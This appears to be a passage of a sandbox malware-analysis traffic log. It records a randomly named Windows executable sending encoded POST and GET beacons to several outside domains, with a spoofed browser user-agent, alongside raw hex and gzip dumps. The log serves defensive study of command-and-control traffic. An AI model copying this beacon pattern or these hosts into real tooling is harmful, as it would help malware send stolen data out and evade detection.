                                                                  Jan 10, 2025 18:52:41.428215027 CET454OUTGET /3oq9/?3h=2MJNacGdKZTNHNzWrRqovynOPBr8E/IdeLZZPQlvVcFfWk0fi2yrHAqCm0wTlbN3Ra2bNNLNNGmcvIo8esHm09siwkoQohFpIo7lKjiy8KvUx5E5SY/z4nc=&Ol=yN0LtN-HDTPXX HTTP/1.1
                                                                  Host: www.opro.vip
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Language: en-us
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                                  Jan 10, 2025 18:52:42.296263933 CET150INHTTP/1.1 404 Not Found
                                                                  Date: Fri, 10 Jan 2025 17:52:42 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 419
                                                                  Connection: close
                                                                  ETag: "6642ed07-1a3"
                                                                  Jan 10, 2025 18:52:42.297291994 CET419INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69
                                                                  Data Ascii: <!DOCTYPE html><html><head><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta charset="utf-8"><title></title><style></style></head><body><script type="text/javascript"> document.write('<ifra


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  25192.168.2.45002766.235.200.145801780C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 10, 2025 18:52:47.362998962 CET722OUTPOST /v9ah/ HTTP/1.1
                                                                  Host: www.santillo.bet
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-us
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: max-age=0
                                                                  Content-Length: 199
                                                                  Connection: close
                                                                  Origin: http://www.santillo.bet
                                                                  Referer: http://www.santillo.bet/v9ah/
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                                  Data Raw: 33 68 3d 2f 41 66 37 55 53 71 56 66 4a 4f 38 59 7a 52 67 58 4c 47 6e 4f 62 76 59 52 70 76 5a 37 4a 4b 48 54 39 67 65 78 6d 42 32 4a 6c 39 57 73 73 53 35 73 6d 46 76 31 76 41 6c 41 50 43 47 72 51 57 59 75 52 7a 48 76 53 58 78 71 58 50 44 4c 58 50 76 6a 6e 7a 33 73 57 61 4b 49 62 61 70 41 73 7a 56 4b 57 75 4e 5a 69 72 67 30 74 55 32 72 36 69 65 73 51 6c 74 4e 36 64 44 61 57 6b 69 41 71 49 7a 58 66 46 75 6b 4d 69 71 6a 68 41 71 43 38 58 61 32 56 7a 31 2b 75 78 62 67 51 69 59 33 37 54 35 66 34 44 34 43 47 65 31 62 61 31 67 4e 2f 39 75 53 66 44 4b 64 78 6d 76 73 49 68 57 59 6b 49 4d 76 67 3d 3d
                                                                  Data Ascii: 3h=/Af7USqVfJO8YzRgXLGnObvYRpvZ7JKHT9gexmB2Jl9WssS5smFv1vAlAPCGrQWYuRzHvSXxqXPDLXPvjnz3sWaKIbapAszVKWuNZirg0tU2r6iesQltN6dDaWkiAqIzXfFukMiqjhAqC8Xa2Vz1+uxbgQiY37T5f4D4CGe1ba1gN/9uSfDKdxmvsIhWYkIMvg==
                                                                  Jan 10, 2025 18:52:48.100738049 CET1236INHTTP/1.1 404 Not Found
                                                                  Date: Fri, 10 Jan 2025 17:52:48 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Link: <https://santillo.bet/wp-json/>; rel="https://api.w.org/"
                                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                  Vary: Accept-Encoding
                                                                  host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                                                                  X-Newfold-Cache-Level: 2
                                                                  Referrer-Policy: no-referrer-when-downgrade
                                                                  X-Endurance-Cache-Level: 2
                                                                  X-nginx-cache: WordPress
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Set-Cookie: __cf_bm=kPF5WOIbv289WV_8Iv3X8SkQUHdrTl1cyi.LnhZ19NE-1736531568-1.0.1.1-wLlpJPI2CpHKNBGn5BQnfRjo_e0COCMx6BtjRy_5UCTxce2zSGIWMDIdXP3vj2Nef.CJBuhWdBE6r3OyGWawFg; path=/; expires=Fri, 10-Jan-25 18:22:48 GMT; domain=.www.santillo.bet; HttpOnly
                                                                  Set-Cookie: _cfuvid=tjDDRZqDWqo8a54c.rcLDL7Wr_6tCMYR8nvg3i_x0.Y-1736531568058-0.0.1.1-604800000; path=/; domain=.www.santillo.bet; HttpOnly
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ffe85dadf137c9f-EWR
                                                                  Content-Encoding: gzip
                                                                  Data Raw: 37 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 c4 58 e1 6e db 38 12 fe 6d 3f 05 c3 e2 ce 7f 4c c9 4e 36 9b d6 91 54 1c ba 5d 60 81 1e b6 40 36 c0 1e 92 c0 a0 a4 b1 c4 94 22 b5 24 65 27 17 e4 61 ee e7 3d c5 01 7d b2 05 49 c9 96 1c a7 4d b1 05 ce 81 61 71 c8 99 f9 66 38 1c 7e 4a 74 f4 d3 af ef 7e fb d7 c7 f7 a8 34 15 4f c6 91 fd 41 9c 8a 22 c6 20 c8 e5 05 b6 32 a0 79 32 1e 45 15 18 8a b2 92 2a 0d 26 c6 97 bf fd 4c 5e 63 14 da 19 c3 0c 87 44 53 61 18 e7 32 48 c1 44 a1 97 8d 5a 35 41 2b 88 f1 9a c1 a6 96 ca 60 94 49 61 40 98 18 6f 58 6e ca 38 87 35 cb 80 b8 c1 14 55 f4 8e 55 4d 45 74 46 39 c4 f3 29 62 82 19 46 f9 4e 50 31 d1 5f 81 b7 f0 bc 9f 1c 74 a6 58 6d 98 14 3d 57 38 dc 2e 2b 8d a9 09 fc d1 b0 75 8c 7f 27 97 ff 20 ef 64 55
                                                                  Data Ascii: 719Xn8m?LN6T]`@6"$e'a=}IMaqf8~Jt~4OA" 2y2E*&L^cDSa2HDZ5A+`Ia@oXn85UUMEtF9)bFNP1_tXm=W8.+u' dU
                                                                  Jan 10, 2025 18:52:48.100764036 CET1236INData Raw: 53 c3 52 0e 7d 05 b4 d3 a8 95 ac 41 99 fb 18 cb 62 a1 99 81 a5 75 d5 5b dc 8f 1e 11 84 9f 51 75 69 79 46 ed 59 9d fb ba af f2 4f ca ec 13 15 19 3c a7 d1 28 de 53 b0 d1 2e c2 f0 25 ae 0e 67 ee f3 7f 3e 82 32 20 20 03 44 d1 85 b5 43 0b 89 3e 7c 90
                                                                  Data Ascii: SR}Abu[QuiyFYO<(S.%g>2 DC>|)#RDrEOHqK-@"[p>osbHiiODxWqUgA]m9LIeDFdZO!5o&tX2rI0:tLkPx~6rF|ba}J*gEdk
                                                                  Jan 10, 2025 18:52:48.100775003 CET365INData Raw: 6b 7b 8c 1c 43 eb e2 ed 26 6d c8 dd 73 1b aa 2b 81 af 14 23 d3 4b 4f 2a 7c 4d 6f 75 e7 cf ea fd ff 0f 47 68 6b 3f 19 8d 5c f7 ef 6e 93 03 9c 6e 97 b1 03 73 bb 8b 64 70 e9 72 99 7d f2 f7 eb d8 f3 23 df 4d 9e b8 d2 96 5a 7d c9 01 f2 2b 06 6e ac b2
                                                                  Data Ascii: k{C&ms+#KO*|MouGhk?\nnsdpr}#MZ}+ngJcV%o* rzuqh>T}1&gMMKd@}rqIpL'`7RBQC?ym=!r7YNn5;(Nk;/nr)(FeZEOA


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  26192.168.2.45002866.235.200.145801780C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 10, 2025 18:52:49.967571020 CET742OUTPOST /v9ah/ HTTP/1.1
                                                                  Host: www.santillo.bet
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-us
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: max-age=0
                                                                  Content-Length: 219
                                                                  Connection: close
                                                                  Origin: http://www.santillo.bet
                                                                  Referer: http://www.santillo.bet/v9ah/
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                                  Data Raw: 33 68 3d 2f 41 66 37 55 53 71 56 66 4a 4f 38 5a 51 35 67 59 4b 47 6e 65 4c 76 58 50 35 76 5a 73 5a 4b 35 54 38 63 65 78 6e 46 66 4b 57 5a 57 74 4f 61 35 74 6b 39 76 32 76 41 6c 49 76 43 44 6c 77 57 74 75 52 2b 30 76 57 58 78 71 58 62 44 4c 56 58 76 67 51 66 34 74 47 61 49 46 37 62 50 64 63 7a 56 4b 57 75 4e 5a 69 2f 4f 30 74 4d 32 6f 4b 53 65 74 78 6c 71 4f 36 64 4d 66 57 6b 69 57 61 49 33 58 66 45 55 6b 4f 57 45 6a 6a 34 71 43 2b 50 61 32 68 6e 32 70 2b 78 64 74 77 6a 4d 37 2b 75 48 65 59 36 59 4c 47 57 67 62 72 52 58 49 35 77 30 44 75 69 64 50 78 43 63 78 50 6f 69 56 6e 31 46 30 70 44 35 64 76 55 68 45 4a 6c 68 6b 74 57 42 62 4a 77 69 55 31 73 3d
                                                                  Data Ascii: 3h=/Af7USqVfJO8ZQ5gYKGneLvXP5vZsZK5T8cexnFfKWZWtOa5tk9v2vAlIvCDlwWtuR+0vWXxqXbDLVXvgQf4tGaIF7bPdczVKWuNZi/O0tM2oKSetxlqO6dMfWkiWaI3XfEUkOWEjj4qC+Pa2hn2p+xdtwjM7+uHeY6YLGWgbrRXI5w0DuidPxCcxPoiVn1F0pD5dvUhEJlhktWBbJwiU1s=
                                                                  Jan 10, 2025 18:52:50.700732946 CET1236INHTTP/1.1 404 Not Found
                                                                  Date: Fri, 10 Jan 2025 17:52:50 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Link: <https://santillo.bet/wp-json/>; rel="https://api.w.org/"
                                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                  Vary: Accept-Encoding
                                                                  host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                                                                  X-Newfold-Cache-Level: 2
                                                                  Referrer-Policy: no-referrer-when-downgrade
                                                                  X-Endurance-Cache-Level: 2
                                                                  X-nginx-cache: WordPress
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Set-Cookie: __cf_bm=K9cchmZV9L18Uz6a40P9HjSoChJpH5MWTf4TC497znU-1736531570-1.0.1.1-O5SA7sTayuFHs7fbBoOpzkbVABEGnUx8QxtUnL4Hl..FnNys9qNxhNGtYwy2y1ryE4u9XGocNs00nJVxtB2hSg; path=/; expires=Fri, 10-Jan-25 18:22:50 GMT; domain=.www.santillo.bet; HttpOnly
                                                                  Set-Cookie: _cfuvid=C1.elr4RXk_GoQvjY3xrxDTseg2.UvfbIPX.0JDABbc-1736531570654-0.0.1.1-604800000; path=/; domain=.www.santillo.bet; HttpOnly
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ffe85eb683f18b8-EWR
                                                                  Content-Encoding: gzip
                                                                  Data Raw: 37 32 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 c4 58 e1 6e db 38 12 fe 6d 3f 05 c3 e2 ce 7f 4c c9 4e 36 9b d6 91 54 1c ba 5d 60 81 1e b6 40 36 c0 1e 92 c0 a0 a4 b1 c4 94 22 b5 24 65 27 17 e4 61 ee e7 3d c5 01 7d b2 05 49 c9 96 1c a7 4d b1 05 ce 81 61 71 c8 99 f9 66 38 1c 7e 4a 74 f4 d3 af ef 7e fb d7 c7 f7 a8 34 15 4f c6 91 fd 41 9c 8a 22 c6 20 c8 e5 05 b6 32 a0 79 32 1e 45 15 18 8a b2 92 2a 0d 26 c6 97 bf fd 4c 5e 63 14 da 19 c3 0c 87 44 53 61 18 e7 32 48 c1 44 a1 97 8d 5a 35 41 2b 88 f1 9a c1 a6 96 ca 60 94 49 61 40 98 18 6f 58 6e ca 38 87 35 cb 80 b8 c1 14 55 f4 8e 55 4d 45 74 46 39 c4 f3 29 62 82 19 46 f9 4e 50 31 d1 5f 81 b7 f0 bc 9f 1c 74 a6 58 6d 98 14 3d 57 38 dc 2e 2b 8d a9 09 fc d1 b0 75 8c 7f 27 97 ff 20 ef 64 55
                                                                  Data Ascii: 724Xn8m?LN6T]`@6"$e'a=}IMaqf8~Jt~4OA" 2y2E*&L^cDSa2HDZ5A+`Ia@oXn85UUMEtF9)bFNP1_tXm=W8.+u' dU
                                                                  Jan 10, 2025 18:52:50.700750113 CET1236INData Raw: 53 c3 52 0e 7d 05 b4 d3 a8 95 ac 41 99 fb 18 cb 62 a1 99 81 a5 75 d5 5b dc 8f 1e 11 84 9f 51 75 69 79 46 ed 59 9d fb ba af f2 4f ca ec 13 15 19 3c a7 d1 28 de 53 b0 d1 2e c2 f0 25 ae 0e 67 ee f3 7f 3e 82 32 20 20 03 44 d1 85 b5 43 0b 89 3e 7c 90
                                                                  Data Ascii: SR}Abu[QuiyFYO<(S.%g>2 DC>|)#RDrEOHqK-@"[p>osbHiiODxWqUgA]m9LIeDFdZO!5o&tX2rI0:tLkPx~6rF|ba}J*gEdk
                                                                  Jan 10, 2025 18:52:50.700761080 CET360INData Raw: 6b 7b 8c 1c 43 eb e2 ed 26 6d c8 dd 73 1b aa 2b 81 af 14 23 d3 4b 4f 2a 7c 4d 6f 75 e7 cf ea fd ff 0f 47 68 6b 3f 19 8d 5c f7 ef 6e 93 03 9c 6e 97 b1 03 73 bb 8b 64 70 e9 72 99 7d f2 f7 eb d8 f3 23 df 4d 9e b8 d2 96 5a 7d c9 01 f2 2b 06 6e ac b2
                                                                  Data Ascii: k{C&ms+#KO*|MouGhk?\nnsdpr}#MZ}+ngJcV%o* rzuqh>T}1&gMMKd@}rqIpL'`7RBQC?ym=!r7YNn5;(Nk;/nr)(FeZEOA


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  27192.168.2.45002966.235.200.145801780C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 10, 2025 18:52:52.512552023 CET10824OUTPOST /v9ah/ HTTP/1.1
                                                                  Host: www.santillo.bet
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-us
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: max-age=0
                                                                  Content-Length: 10299
                                                                  Connection: close
                                                                  Origin: http://www.santillo.bet
                                                                  Referer: http://www.santillo.bet/v9ah/
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                                  Data Raw: 33 68 3d 2f 41 66 37 55 53 71 56 66 4a 4f 38 5a 51 35 67 59 4b 47 6e 65 4c 76 58 50 35 76 5a 73 5a 4b 35 54 38 63 65 78 6e 46 66 4b 57 52 57 73 39 43 35 74 44 52 76 33 76 41 6c 47 50 43 43 6c 77 57 30 75 52 6e 63 76 57 54 48 71 56 6a 44 52 32 66 76 6c 6b 4c 34 6a 47 61 49 5a 4c 62 62 41 73 7a 41 4b 57 65 4a 5a 69 76 4f 30 74 4d 32 6f 4a 4b 65 39 51 6c 71 49 36 64 44 61 57 6b 75 41 71 49 66 58 66 63 75 6b 4f 53 36 2f 43 59 71 44 65 66 61 6c 43 50 32 71 65 78 66 6a 51 6a 45 37 2b 71 69 65 59 6d 71 4c 48 53 4b 62 6f 4e 58 46 73 5a 32 5a 2f 2f 47 65 33 61 39 73 5a 67 63 56 6e 70 70 33 2b 4c 38 63 36 5a 2b 52 49 70 4d 76 2b 2f 70 65 5a 55 58 4a 68 4e 41 72 75 46 63 74 61 61 64 64 75 43 5a 4d 69 45 31 49 4f 4b 4c 2b 75 30 51 73 75 70 4b 50 4f 70 57 67 75 6f 2b 54 53 4a 51 78 4e 33 38 38 47 36 73 4b 52 38 69 76 72 67 47 34 67 37 4c 6e 63 43 7a 2f 47 6a 71 4d 2b 69 68 67 48 46 54 45 39 41 61 39 67 71 4d 46 4d 66 41 71 61 31 70 57 32 47 69 77 43 6c 5a 77 6e 74 37 51 4f 68 61 52 34 64 42 67 2f 69 50 4c 66 59 [TRUNCATED]
                                                                  Data Ascii: 3h=/Af7USqVfJO8ZQ5gYKGneLvXP5vZsZK5T8cexnFfKWRWs9C5tDRv3vAlGPCClwW0uRncvWTHqVjDR2fvlkL4jGaIZLbbAszAKWeJZivO0tM2oJKe9QlqI6dDaWkuAqIfXfcukOS6/CYqDefalCP2qexfjQjE7+qieYmqLHSKboNXFsZ2Z//Ge3a9sZgcVnpp3+L8c6Z+RIpMv+/peZUXJhNAruFctaadduCZMiE1IOKL+u0QsupKPOpWguo+TSJQxN388G6sKR8ivrgG4g7LncCz/GjqM+ihgHFTE9Aa9gqMFMfAqa1pW2GiwClZwnt7QOhaR4dBg/iPLfYaLEhBrRsIN6Fea6tiwcVy423czTXU2c/aWQYDcDi3AyHAUcrTVuFYKzPRNwNDh7xmz0Hy08xU1CNOUwUtYx0GQLBcIZjWRt3UzgJW7QaVVM8G+7tuPsOozPY+6w0Ux8k7Hi6TVtRp9R3WZ+rZYgjKEG0owEGjtDBsxnxIKdv4+psYrAmoJfA/70QpSMlQF36KlNO8qAnPjVf0GGGYCE2hcOve9u1m65Vq2Jaj2UnflqUk4Dni1mh7KG/0n7XFyNMUsU2uYvfvv/zPgG1yovCmt9D63BQklQZzDZ+o7j91Z+XaEWkJahnLd9tQNL1bY3D8tNoaSnKPBAqFW4g5ZSDuSWf+hh3ZvR8ksj74sLrxHkc9jNXqoa4sAycWicGzmoG8KWLOjLsD8nuv6/rZsYJ06XGlGWmggIxpXGs1WC6hHUZZTOnVobAuxOizQzFB1Z5psjWslml4s+0LkIYF6NLTMydqC8cg6ugQsvRB3QyCZwRaka062MFWf418DjWgrFY8OoRiOYCu4UXgPvD2lplvx4gxYoEOkjrlxkj6stt2ePKhdN9CxobhdSP0rrUcyslmw4BJ8q1XSq604gQktfcpWKrGPQBQH+1oBLTvDGtG1Fz53tE8Y+B08d9ulEzExaX/vqeZlxrkVavb8YG58k1XLIICYzRryXj7O [TRUNCATED]
                                                                  Jan 10, 2025 18:52:53.207634926 CET1236INHTTP/1.1 404 Not Found
                                                                  Date: Fri, 10 Jan 2025 17:52:53 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Link: <https://santillo.bet/wp-json/>; rel="https://api.w.org/"
                                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                  Vary: Accept-Encoding
                                                                  host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                                                                  X-Newfold-Cache-Level: 2
                                                                  Referrer-Policy: no-referrer-when-downgrade
                                                                  X-Endurance-Cache-Level: 2
                                                                  X-nginx-cache: WordPress
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Set-Cookie: __cf_bm=xk_ltVpSlwlZZ42q52B_m0jLl79P5naSHaqtn3N3vZ0-1736531573-1.0.1.1-Ucb5Xtle.3ZPXmsaP5eeiH6A.49KjLMSuYFFFLdGwRSPT85BDN5_UctJvqWS7yQtPY96f2ZXUU41UZd.mxCADg; path=/; expires=Fri, 10-Jan-25 18:22:53 GMT; domain=.www.santillo.bet; HttpOnly
                                                                  Set-Cookie: _cfuvid=Vp8sHZlvK9FHbdMB1Zxd3QFVCFX0UcpB949mCxG3hOQ-1736531573139-0.0.1.1-604800000; path=/; domain=.www.santillo.bet; HttpOnly
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ffe85fb1a98efa1-EWR
                                                                  Content-Encoding: gzip
                                                                  Data Raw: 37 32 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 c4 58 e1 6e db 38 12 fe 6d 3f 05 c3 e2 ce 7f 4c c9 4e 36 9b d6 91 54 1c ba 5d 60 81 1e b6 40 36 c0 1e 92 c0 a0 a4 b1 c4 94 22 b5 24 65 27 17 e4 61 ee e7 3d c5 01 7d b2 05 49 c9 96 1c a7 4d b1 05 ce 81 61 71 c8 99 f9 66 38 1c 7e 4a 74 f4 d3 af ef 7e fb d7 c7 f7 a8 34 15 4f c6 91 fd 41 9c 8a 22 c6 20 c8 e5 05 b6 32 a0 79 32 1e 45 15 18 8a b2 92 2a 0d 26 c6 97 bf fd 4c 5e 63 14 da 19 c3 0c 87 44 53 61 18 e7 32 48 c1 44 a1 97 8d 5a 35 41 2b 88 f1 9a c1 a6 96 ca 60 94 49 61 40 98 18 6f 58 6e ca 38 87 35 cb 80 b8 c1 14 55 f4 8e 55 4d 45 74 46 39 c4 f3 29 62 82 19 46 f9 4e 50 31 d1 5f 81 b7 f0 bc 9f 1c 74 a6 58 6d 98 14 3d 57 38 dc 2e 2b 8d a9 09 fc d1 b0 75 8c 7f 27 97 ff 20 ef 64 55
                                                                  Data Ascii: 724Xn8m?LN6T]`@6"$e'a=}IMaqf8~Jt~4OA" 2y2E*&L^cDSa2HDZ5A+`Ia@oXn85UUMEtF9)bFNP1_tXm=W8.+u' dU
                                                                  Jan 10, 2025 18:52:53.207662106 CET224INData Raw: 53 c3 52 0e 7d 05 b4 d3 a8 95 ac 41 99 fb 18 cb 62 a1 99 81 a5 75 d5 5b dc 8f 1e 11 84 9f 51 75 69 79 46 ed 59 9d fb ba af f2 4f ca ec 13 15 19 3c a7 d1 28 de 53 b0 d1 2e c2 f0 25 ae 0e 67 ee f3 7f 3e 82 32 20 20 03 44 d1 85 b5 43 0b 89 3e 7c 90
                                                                  Data Ascii: SR}Abu[QuiyFYO<(S.%g>2 DC>|)#RDrEOHqK-@"[p>osbHiiODxWqUgA]m9LIeDFdZO!5o&tX2rI0:tLkPx~6rF|
                                                                  Jan 10, 2025 18:52:53.207673073 CET1236INData Raw: 62 61 7d 0d d5 4a 0a a3 bf 17 2a 67 ec 45 a8 1c 16 64 6b 2b c6 06 ee 8c 55 c7 49 2a f3 7b f4 60 13 5f 28 d9 88 9c 64 92 4b b5 40 af e6 ee f3 18 d4 0a ac 33 50 5f 5a e5 ad 58 2c 64 45 2b c6 ef 17 e8 d7 1a 84 2d 1d 7d 8e 1e 03 7b 80 88 3b 0a 53 d4
                                                                  Data Ascii: ba}J*gEdk+UI*{`_(dK@3P_ZX,dE+-}{;S(`D.!5z"kdm4EAAuCQAh%q^:}Z#A2~UQU5IrHsbcq+^ mT[-J4C@BcO >#_dNlXU
                                                                  Jan 10, 2025 18:52:53.207684040 CET136INData Raw: d0 28 46 0f d8 f2 ca 65 5a e0 45 db 4f ae c3 eb 41 10 d7 bd cb f1 ba bb 1d af dd f5 78 1d ce de 5c 0f 2f c8 29 2e 28 e7 76 eb a8 52 f4 1e 2f ae 6e a6 38 e5 8d 5a 3a c6 aa 99 b9 c7 0b 7c 8a a7 8e 06 2c 2d eb c6 8b 2b bc 7d 43 fe 9e e4 f9 e6 f1 7c
                                                                  Data Ascii: (FeZEOAx\/).(vR/n8Z:|,-+}C|mo]uw~G%[X"0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  28192.168.2.45003066.235.200.145801780C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 10, 2025 18:52:55.052181005 CET458OUTGET /v9ah/?3h=yC3bXnyDZ4yqdl1qCLuqI8XvPsLlvIGaS84o6k5LK0tOudOrulJf3tgJD9KHnC2w/BXUgGDboXn9a2b9lFH1yxqNYPuRfPrUawe2VwTEtds8itq/kxdhNfk=&Ol=yN0LtN-HDTPXX HTTP/1.1
                                                                  Host: www.santillo.bet
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Language: en-us
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                                  Jan 10, 2025 18:52:55.759372950 CET1094INHTTP/1.1 301 Moved Permanently
                                                                  Date: Fri, 10 Jan 2025 17:52:55 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                  X-Redirect-By: WordPress
                                                                  Location: http://santillo.bet/v9ah/?3h=yC3bXnyDZ4yqdl1qCLuqI8XvPsLlvIGaS84o6k5LK0tOudOrulJf3tgJD9KHnC2w/BXUgGDboXn9a2b9lFH1yxqNYPuRfPrUawe2VwTEtds8itq/kxdhNfk=&Ol=yN0LtN-HDTPXX
                                                                  host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                                                                  X-Newfold-Cache-Level: 2
                                                                  Referrer-Policy: no-referrer-when-downgrade
                                                                  X-Endurance-Cache-Level: 2
                                                                  X-nginx-cache: WordPress
                                                                  CF-Cache-Status: MISS
                                                                  Set-Cookie: __cf_bm=WzeOmupQenHMcU7yCE9zyKRB8uSQkiEZUUH40Vp8_9s-1736531575-1.0.1.1-QGBQfRYm0xkvTS5A0os3ReHGkDLNCQEuFZvNK6.Kco1zMtUWBMmRmQTBX7WUk9CHhKf2RCn7r8DdAirUbnrBVg; path=/; expires=Fri, 10-Jan-25 18:22:55 GMT; domain=.www.santillo.bet; HttpOnly
                                                                  Set-Cookie: _cfuvid=1iYqvkid4qSPtQJb77tW07le0BZRSgeSrIUXNFn6Ngs-1736531575702-0.0.1.1-604800000; path=/; domain=.www.santillo.bet; HttpOnly
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ffe860b1faf4263-EWR
                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  29192.168.2.45003185.159.66.93801780C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 10, 2025 18:53:01.192965984 CET728OUTPOST /xmwd/ HTTP/1.1
                                                                  Host: www.esnafus.online
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-us
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: max-age=0
                                                                  Content-Length: 199
                                                                  Connection: close
                                                                  Origin: http://www.esnafus.online
                                                                  Referer: http://www.esnafus.online/xmwd/
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                                  Data Raw: 33 68 3d 46 47 57 4c 6b 54 36 33 56 41 41 46 6f 49 2b 6b 6f 52 52 4e 59 77 62 4d 72 51 33 62 38 61 6c 47 73 75 75 31 2b 6c 72 34 35 4a 36 6f 65 75 49 69 39 61 31 52 6c 4d 71 68 74 7a 4c 72 58 4a 72 52 4d 64 50 6d 76 79 57 71 7a 6c 5a 4a 4c 43 6d 56 74 77 79 6d 4a 4c 68 59 32 43 69 6f 75 69 4b 2f 68 67 4e 4d 34 39 6b 75 68 79 2f 39 4c 30 6c 6a 72 66 6d 67 61 79 34 4d 78 36 49 6f 78 43 64 78 2b 65 45 51 6d 2b 55 68 76 54 51 6b 39 62 49 50 7a 6a 66 71 4a 4e 6a 70 53 63 6d 59 75 5a 78 62 73 71 34 31 4d 77 42 63 62 4c 61 48 6f 64 36 74 52 61 46 4b 55 41 56 67 54 6d 43 4c 36 5a 62 58 53 67 3d 3d
